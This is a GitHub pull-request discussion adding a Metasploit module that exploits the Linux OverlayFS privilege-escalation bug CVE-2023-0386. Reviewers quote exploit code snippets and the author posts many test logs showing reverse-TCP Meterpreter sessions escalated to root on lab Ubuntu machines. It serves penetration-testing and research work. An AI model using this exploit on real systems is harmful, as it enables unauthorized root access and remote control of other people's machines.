Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386 #19441

Merged
merged 34 commits into from
Sep 26, 2024
Merged

Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386 #19441

merged 34 commits into from
Sep 26, 2024

Conversation

Takahiro-Yoko
Copy link
Contributor

@Takahiro-Yoko Takahiro-Yoko commented Sep 5, 2024
edited
Loading

close #18766

Vulnerable Application

This exploit targets the Linux kernel bug in OverlayFS.

A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities
was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount.
This uid mapping bug allows a local user to escalate their privileges on the system.

The vulnerability affects:

* Linux kernel from (including) 5.11 up to (excluding) 5.15.91 and from (including) 5.16 Up to (excluding) 6.1.9

This module was successfully tested on:

* Ubuntu kernel version 5.13.0-1021-oem on x64/amd64
* Ubuntu kernel version 6.0.0-060000-generic on x64/amd64
* Ubuntu kernel version 6.0.19-060019-generic on x64/amd64
* Ubuntu kernel version 6.1.0-060100-generic on x64/amd64

Install

  1. Install Ubuntu version 22.04 LTS
  2. (Optional) Change kernel version
sudo apt update
sudo apt install -y linux-image-5.13.0-1021-oem linux-headers-5.13.0-1021-oem
reboot
  1. Install the required libraries
sudo apt update
sudo apt install -y gcc cmake fuse libfuse-dev libcap-dev

Verification Steps

  1. Make an Ubuntu
  2. Create a meterpreter or shell payload and upload it to the Ubuntu target
  3. Set up a handler for the payload
  4. Launch the payload as a regular user on the Ubuntu target and connect the handler
  5. Do: use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
  6. Do: run session=<session> lhost=<lhost>
  7. You should get a root

@bwatters-r7 bwatters-r7 self-assigned this Sep 5, 2024
jheysel-r7
jheysel-r7 reviewed Sep 5, 2024
View reviewed changes
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated
if live_compile? && command_exists?('xxd')
vprint_status('Live compiling exploit on system...')
upload_and_compile("#{exploit_dir}/shell", exploit_source('CVE-2023-0386', 'getshell.c'))
cmd_exec("cd #{exploit_dir} && xxd -i shell > shell.xxd")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For Meterepreter sessions after the cd command is executed the working directory will revert to the original directory, whereas in a shell session there will be a state change and the subsequent commands will be executed from the exploit_dir.

To better support Meterpreter sessions could you just pass in the relative directory to all commands instead running the cd?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you for your comment!

I intend to use cd command just for xxd command.

When using xxd command, we need -n option to set the variable name used in C include output (-i). Seems like older xxd command does not have -n option.
xxd

Without -n option and pass relative path (full path in this case, though) to xxd, variable name becomes something below (maybe / and . convert to _?).
xxdwithoutn

Handling this could cause some trouble, if not done correctly, so temporary change directory and run xxd command to specify file name without relative path. Is it acceptable?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Now I've updated a lot, and no longer need cd command. cd97b08
Thank you!

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated
register_file_for_cleanup(payload_path)

# Launch exploit
timeout = 30
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Should this maybe be user configurable?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you! See. dc81711

bwatters-r7
bwatters-r7 reviewed Sep 5, 2024
View reviewed changes
Copy link
Contributor

@bwatters-r7 bwatters-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you for the module! You may want to check out the overlayfs module I wrote a few years ago, as a lot of the ruby code will be the same, and I think it might be worthwhile to take the same approach for launching the payload directly from within the exploit code: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

external/source/exploits/CVE-2023-0386/getshell.c Outdated
return -1;
}

system("/bin/bash");
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Could we instead call the binary payload directly here?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you!
I've tested directly calling payload using cd97b08 and 692531b (latter needs to set setuid and setgid in C code).
Seems like directly calling payload takes some time (about 1 min) to really open Meterpreter session after Meterpreter session opened message.

This one (not directly calling payload) is much faster (about a few sec). 8366252 (needs to set setuid and setgid in C code).

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think adding the setuid and setgid in the C is a better path- fewer compiles and worth a little longer wait, but that's just my opinion.

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated
cmd_exec("echo '#{payload_path} & exit' | #{exploit_dir}/cve-2023-0386", nil, timeout)
end

def get_exploit(exploit_dir)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We should move this to the metasploit-framework/data/external/source directory in a separate file.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you! I've moved C code. cd97b08

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated

#include "shell.xxd"

#define DIR_BASE "#{exploit_dir}"
Copy link
Contributor

@bwatters-r7 bwatters-r7 Sep 5, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

EDIT- I now understand why this all looks familiar; I wrote a module for a different overlyfs exploit. I passed the exploit dir and the payload in as a parameter. You cans ee my source here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you! I've changed to pass the exploit directory and the payload in as a parameter. cd97b08

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated
upload_and_compile("#{exploit_dir}/shell", exploit_source('CVE-2023-0386', 'getshell.c'))
cmd_exec("cd #{exploit_dir} && xxd -i shell > shell.xxd")
write_file("#{exploit_dir}/cve-2023-0386.c", strip_comments(get_exploit("#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}")))
cmd_exec("gcc -o #{exploit_dir}/cve-2023-0386 #{exploit_dir}/cve-2023-0386.c -D_FILE_OFFSET_BITS=64 -static -lfuse -ldl -pthread")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there a reason you're using upload_and_compile above, but manually using gcc here?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I misunderstood upload_and_compile's second argument is a file path. cd97b08

external/source/exploits/CVE-2023-0386/getshell.c Outdated


int main(int argc, char const *argv[]) {
if (setuid(0) < 0) {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You're using setuid and setgid here, but also in the payload?
Since the set commands are supported in the binary payloads, I don't think this is needed unless we're supporting ARCH_CMD payloads, and I don't see you using them here?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

EDIT- I don't think you need this; I think we can directly call the binary payload from within the exploit code itself.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you!
cd97b08 does not need setuid and setgid.
Seems like 692531b and 8366252 need setuid and setgid, despite setting in the payload.

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated
cmd_exec("chmod +x #{exploit_dir}/cve-2023-0386")
else
vprint_status('Dropping pre-compiled exploit on system...')
upload_and_chmodx("#{exploit_dir}/cve-2023-0386", exploit_data('CVE-2023-0386', 'cve-2023-0386'))
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

How does this work if we need to change the exploit_dir value?

Copy link
Contributor Author

@Takahiro-Yoko Takahiro-Yoko Sep 6, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you! I've added directory exist check and cleanup. 920ef70 1cc562c Correct?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I should use exploit_path? 9e832eb

jvoisin
jvoisin reviewed Sep 6, 2024
View reviewed changes
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
end

# Upload exploit executable
exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why create a directory for the exploit, instead of simply putting it into #{base_dir}?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

While not strictly necessary, this code pattern was introduced in local exploit modules to keep all artifacts (such as temp files from compiling on-system) within one directory which can be deleted upon completion.

https://github.com/rapid7/metasploit-framework/pull/19441/files#diff-582239976447427dfe518f2db829db0f32f85069b220a831ef7c408b06957d34R153

Given this module performs a few rm -rf calls, I'd certainly feel safer keeping exploitation contained.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you!

I'd certainly feel safer keeping exploitation contained.

I agree.

Takahiro-Yoko and others added 17 commits September 6, 2024 21:45
@Takahiro-Yoko
Copy link
Contributor Author

Thank you for reviewing!
Now I've confirmed this module is successfully working on:

* Ubuntu kernel version 5.13.0-1021-oem on x64/amd64
* Ubuntu kernel version 6.0.0-060000-generic on x64/amd64
* Ubuntu kernel version 6.0.19-060019-generic on x64/amd64
* Ubuntu kernel version 6.1.0-060100-generic on x64/amd64

bwatters-r7
bwatters-r7 reviewed Sep 23, 2024
View reviewed changes
Copy link
Contributor

@bwatters-r7 bwatters-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Amazing work! One last thought on trying to get out of the need to have the shell binary. If you make a call to setuid and setgid` in the exploit before calling the payload, you don't need to have that shell binary to do it.

external/source/exploits/CVE-2023-0386/cve_2023_0386.c Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb Outdated Show resolved Hide resolved
@Takahiro-Yoko
Copy link
Contributor Author

Thanks! Applied your suggestions, updated binary and retested.

Ubuntu 20.04 (Linux 5.13.0-1021-oem) 
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:57442) at 2024-09-24 19:40:26 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.4i2PvqV7/.JgQxGflwzA' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.4i2PvqV7
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:57444) at 2024-09-24 19:40:51 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 2

[*] 192.168.56.102 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.idEAVu/.Qm2Z9Ggt' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.idEAVu
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.102:57446) at 2024-09-24 19:42:07 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 3

[*] 192.168.56.102 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.hhpwHLY/.fZtCMcNJiz' (18800 bytes) ...
[*] Writing '/tmp/.hhpwHLY/.6Jkge71' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.hhpwHLY
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.102:57448) at 2024-09-24 19:43:36 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.0.0-060000-generic) 
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 5 opened (192.168.56.1:4444 -> 192.168.56.10:60584) at 2024-09-24 19:47:19 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.xfFQr/.OhOfAiYT8' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.xfFQr
[*] Meterpreter session 6 opened (192.168.56.1:4444 -> 192.168.56.10:55300) at 2024-09-24 19:47:50 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 6

[*] 192.168.56.10 - Meterpreter session 6 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.BEkixc8SY/.5EjeVIs1cx' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.BEkixc8SY
[*] Meterpreter session 7 opened (192.168.56.1:4444 -> 192.168.56.10:55184) at 2024-09-24 19:49:12 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 7

[*] 192.168.56.10 - Meterpreter session 7 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.zGU0Y3lC/.n4L8gml' (18800 bytes) ...
[*] Writing '/tmp/.zGU0Y3lC/.ErJ3mItMl' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.zGU0Y3lC
[*] Meterpreter session 8 opened (192.168.56.1:4444 -> 192.168.56.10:50666) at 2024-09-24 19:50:36 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.0.19-060019-generic) 
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 9 opened (192.168.56.1:4444 -> 192.168.56.10:56070) at 2024-09-24 19:56:44 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 9...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.naRRsi/.C6JPN9tsKm' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.naRRsi
[*] Meterpreter session 10 opened (192.168.56.1:4444 -> 192.168.56.10:38102) at 2024-09-24 19:57:18 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 10

[*] 192.168.56.10 - Meterpreter session 10 closed.  Reason: Died
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.ePXBvbuk/.GybuIQO145' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.ePXBvbuk
[*] Meterpreter session 11 opened (192.168.56.1:4444 -> 192.168.56.10:50576) at 2024-09-24 19:58:57 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 11

[*] 192.168.56.10 - Meterpreter session 11 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.XWfn1lnlQR/.mdA0b' (18800 bytes) ...
[*] Writing '/tmp/.XWfn1lnlQR/.nT6yoYgkq' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.XWfn1lnlQR
[*] Meterpreter session 12 opened (192.168.56.1:4444 -> 192.168.56.10:34516) at 2024-09-24 20:00:14 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.1.0-060100-generic) 
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 13 opened (192.168.56.1:4444 -> 192.168.56.10:47084) at 2024-09-24 20:06:15 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 13...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.qFqXa42h/.kfSh6H9lx' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.qFqXa42h
[*] Meterpreter session 14 opened (192.168.56.1:4444 -> 192.168.56.10:54724) at 2024-09-24 20:06:49 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 14

[*] 192.168.56.10 - Meterpreter session 14 closed.  Reason: Died
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.2KTojM/.TuFvNKR9YE' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.2KTojM
[*] Meterpreter session 15 opened (192.168.56.1:4444 -> 192.168.56.10:59642) at 2024-09-24 20:08:06 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 15

[*] 192.168.56.10 - Meterpreter session 15 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.3Xjpmq/.ZuVPhPKCh' (18800 bytes) ...
[*] Writing '/tmp/.3Xjpmq/.keQCG' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.3Xjpmq
[*] Meterpreter session 16 opened (192.168.56.1:4444 -> 192.168.56.10:43118) at 2024-09-24 20:09:30 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@bwatters-r7
Copy link
Contributor 

msf6 payload(linux/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4568 -> 10.5.132.129:44206) at 2024-09-24 09:31:21 -0500

msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > show options

Module options (exploit/linux/local/cve_2023_0386_overlayfs_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION  1                yes       The session to run this module on
   TIMEOUT  60               yes       Timeout for exploit (seconds)


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile False 
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.GnaFdtmy9/.6y3LCB' (18040 bytes) ...
[*] Writing '/tmp/.GnaFdtmy9/.155hTk1' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.GnaFdtmy9
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.129:50664) at 2024-09-24 09:33:48 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.129 - Meterpreter session 2 closed.  Reason: User exit
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile True 
compile => True
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.SRDnO7/.lfNiPVLYt' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.SRDnO7
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.129:50666) at 2024-09-24 09:35:37 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >

@bwatters-r7
Copy link
Contributor

I pushed an updated binary because I have trust issues and it is easier for me to recompile than reverse-engineer the binary file.

@bwatters-r7
Copy link
Contributor 

msf6 payload(linux/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4568 -> 10.5.132.129:60362) at 2024-09-26 12:52:16 -0500

msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.129
